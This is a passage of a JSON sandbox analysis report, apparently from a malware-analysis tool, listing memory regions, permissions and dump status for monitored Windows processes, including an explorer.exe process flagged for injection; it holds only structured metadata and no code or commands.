"ref_process_dump": null, "size": 376832, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4112383, "entry_point": 3735552, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1043", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 3735552, "timestamp": "00:00:57.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1045", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:57.183", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1046", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:57.184", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001047-addr_0x00000000019e0000-size_0x0000000000120000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1179648, "start_va": 27131904, "type": "region", "version": 1 }, "end_va": 28311551, "entry_point": 0, "filename": null, "id": "region_1047", "name": "private_0x00000000019e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 27131904, "timestamp": "00:00:57.185", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001048-addr_0x0000000001b60000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_190", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 28704768, "type": "region", "version": 1 }, "end_va": 28966911, "entry_point": 0, "filename": null, "id": "region_1048", "name": "private_0x0000000001b60000", "norm_filename": null, "region_type": "private_memory", "start_va": 28704768, "timestamp": "00:00:57.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 19787775, "entry_point": 0, "filename": null, "id": "region_1049", "name": "pagefile_0x0000000001200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18874368, "timestamp": "00:00:57.190", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001050-addr_0x0000000001300000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 19988479, "entry_point": 0, "filename": null, "id": "region_1050", "name": "private_0x0000000001300000", "norm_filename": null, "region_type": "private_memory", "start_va": 19922944, "timestamp": "00:00:57.191", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001051-addr_0x0000000001ba0000-size_0x0000000000120000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1179648, "start_va": 28966912, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_1051", "name": "private_0x0000000001ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28966912, "timestamp": "00:00:57.194", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001052-addr_0x0000000000390000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_1052", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:57.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1962934272, "type": "region", "version": 1 }, "end_va": 1963323391, "entry_point": 1962934272, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_1054", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1962934272, "timestamp": "00:00:57.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 34340863, "entry_point": 0, "filename": null, "id": "region_1056", "name": "pagefile_0x0000000001cc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30146560, "timestamp": "00:00:57.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1057", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:57.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4046847, "entry_point": 3801088, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1058", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3801088, "timestamp": "00:00:57.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1063", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:57.418", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001064-addr_0x00000000019e0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 27131904, "type": "region", "version": 1 }, "end_va": 27656191, "entry_point": 27131904, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\~DFF8FF715EB6FD8EB1.TMP", "id": "region_1064", "name": "~dff8ff715eb6fd8eb1.tmp", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\~dff8ff715eb6fd8eb1.tmp", "region_type": "memory_mapped_file", "start_va": 27131904, "timestamp": "00:00:57.429", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001065-addr_0x0000000001ac0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 28049408, "type": "region", "version": 1 }, "end_va": 28311551, "entry_point": 0, "filename": null, "id": "region_1065", "name": "private_0x0000000001ac0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28049408, "timestamp": "00:00:57.429", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001066-addr_0x0000000001ba0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 28966912, "type": "region", "version": 1 }, "end_va": 29491199, "entry_point": 0, "filename": null, "id": "region_1066", "name": "private_0x0000000001ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28966912, "timestamp": "00:00:57.432", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001067-addr_0x0000000001cb0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_1067", "name": "private_0x0000000001cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30081024, "timestamp": "00:00:57.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1941766144, "type": "region", "version": 1 }, "end_va": 1941843967, "entry_point": 1941766144, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_1068", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1941766144, "timestamp": "00:00:57.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1933312000, "type": "region", "version": 1 }, "end_va": 1933426687, "entry_point": 1933312000, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_1069", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1933312000, "timestamp": "00:01:06.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1997103103, "entry_point": 1997078528, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1070", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:06.238", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1933246464, "type": "region", "version": 1 }, "end_va": 1933275135, "entry_point": 1933246464, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_1071", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1933246464, "timestamp": "00:01:06.239", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001072-addr_0x00000000003a0000-size_0x0000000000008000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 32768, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3833855, "entry_point": 0, "filename": null, "id": "region_1072", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:01:06.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1931804672, "type": "region", "version": 1 }, "end_va": 1931878399, "entry_point": 1931804672, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_1073", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1931804672, "timestamp": "00:01:06.242", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997557759, "entry_point": 1997340672, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1074", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:01:06.242", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001075-addr_0x00000000020c0000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 35651583, "entry_point": 0, "filename": null, "id": "region_1075", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:01:06.243", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001076-addr_0x00000000020c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 35389439, "entry_point": 0, "filename": null, "id": "region_1076", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:01:06.248", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001077-addr_0x00000000021c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 35651583, "entry_point": 0, "filename": null, "id": "region_1077", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:01:06.248", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1078", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:01:06.249", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001079-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1079", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:06.249", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1080", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:01:06.250", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 134217728, "start_va": 35651584, "type": "region", "version": 1 }, "end_va": 169869311, "entry_point": 0, "filename": null, "id": "region_1081", "name": "private_0x0000000002200000", "norm_filename": null, "region_type": "private_memory", "start_va": 35651584, "timestamp": "00:01:06.256", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001082-addr_0x0000000000400000-size_0x000000000002a000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 172032, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4366335, "entry_point": 0, "filename": null, "id": "region_1082", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:06.268", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001083-addr_0x000000000a340000-size_0x000000000013d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1298432, "start_va": 171180032, "type": "region", "version": 1 }, "end_va": 172478463, "entry_point": 0, "filename": null, "id": "region_1083", "name": "private_0x000000000a340000", "norm_filename": null, "region_type": "private_memory", "start_va": 171180032, "timestamp": "00:01:06.616", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001084-addr_0x000000000a480000-size_0x000000000027b000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2600960, "start_va": 172490752, "type": "region", "version": 1 }, "end_va": 175091711, "entry_point": 0, "filename": null, "id": "region_1084", "name": "private_0x000000000a480000", "norm_filename": null, "region_type": "private_memory", "start_va": 172490752, "timestamp": "00:01:06.616", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001085-addr_0x00000000003b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1085", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:01:06.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4038655, "entry_point": 0, "filename": null, "id": "region_1086", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:01:06.684", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001087-addr_0x00000000003e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_1087", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:01:06.687", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1441792, "start_va": 169869312, "type": "region", "version": 1 }, "end_va": 171311103, "entry_point": 0, "filename": null, "id": "region_1088", "name": "pagefile_0x000000000a200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 169869312, "timestamp": "00:01:06.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4116479, "entry_point": 0, "filename": null, "id": "region_1461", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:10.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5742591, "entry_point": 0, "filename": null, "id": "region_1462", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:01:10.503", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001463-addr_0x0000000000590000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_1463", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:01:10.503", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\Explorer.EXE", "filename": "c:\\windows\\explorer.exe", "id": "proc_7", "image_name": "explorer.exe", "monitor_reason": "injection", "monitored_id": 7, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1089", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 139263, "entry_point": 0, "filename": null, "id": "region_1090", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1091", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 270335, "entry_point": 0, "filename": null, "id": "region_1092", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1093", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1094", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1095", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:01:06.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_1096", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_1097", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1179647, "entry_point": 0, "filename": null, "id": "region_1098", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_1099", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1253375, "entry_point": 0, "filename": null, "id": "region_1100", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:06.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1101", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:06.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1384447, "entry_point": 0, "filename": null, "id": 